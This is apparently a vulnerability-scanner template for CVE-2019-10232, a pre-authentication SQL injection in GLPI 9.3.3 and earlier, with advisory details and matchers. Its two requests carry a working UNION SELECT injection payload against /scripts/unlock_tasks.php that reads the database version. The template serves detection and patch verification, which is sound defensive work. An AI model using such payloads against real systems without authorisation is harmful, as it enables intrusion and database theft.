38 lines
1.4 KiB
YAML
38 lines
1.4 KiB
YAML
id: CVE-2019-10232
|
|
|
|
info:
|
|
name: Pre-authenticated SQL injection in GLPI <= 9.3.3
|
|
author: RedTeamBrasil
|
|
severity: critical
|
|
description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication.
|
|
reference:
|
|
- https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
|
|
- https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
|
|
tags: cve,cve2019,glpi,sqli
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2019-10232
|
|
cwe-id: CWE-89
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
|
|
- "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "-MariaDB-"
|
|
- "Start unlock script"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
|